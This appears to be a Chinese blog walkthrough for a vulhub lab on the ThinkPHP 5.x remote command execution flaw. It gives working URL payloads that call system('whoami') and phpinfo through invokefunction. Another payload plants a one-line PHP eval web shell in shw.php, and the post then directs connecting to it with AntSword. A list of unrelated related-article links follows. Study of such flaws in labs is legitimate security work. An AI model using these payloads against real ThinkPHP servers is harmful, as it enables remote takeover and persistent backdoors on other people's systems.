Thinkphp5x远程命令执行 靶场攻略

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1
\[\]=whoami

3.远程代码执行

POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars 1\[\]=-1

4.写入一句话木马到根目录下的shw.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo "<?php @eval(\$_POSTcmd);?>" > shw.php

5.蚁剑连接

相关推荐
AC赳赳老秦2 小时前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
2502_921286074 小时前
【企业网络管理】DHCP 与 SAMBA:从协议原理到企业级实战配置全解析
开发语言·php
运维管理5 小时前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php
techdashen8 小时前
kTLS 进入 rustls 组织:把 TLS 的数据面交给内核
开发语言·php
Web极客码8 小时前
在WordPress Multisite中添加超级管理员用户
服务器·php·网站
漂亮的摩托9 小时前
深感一无所长,准备试着从零开始写个富文本编辑器
开发语言·php
火星校尉9 小时前
一场数据基建与消费场景的跨界实验
java·前端·数据库·python·php
面朝大海,春不暖,花不开10 小时前
BPF与eBPF简介:核心概念与观测工具概览
开发语言·php·ebpf·bpf·性能观测
威武的花瓣12 小时前
细说ASP.NET的各种异步操作
后端·asp.net·php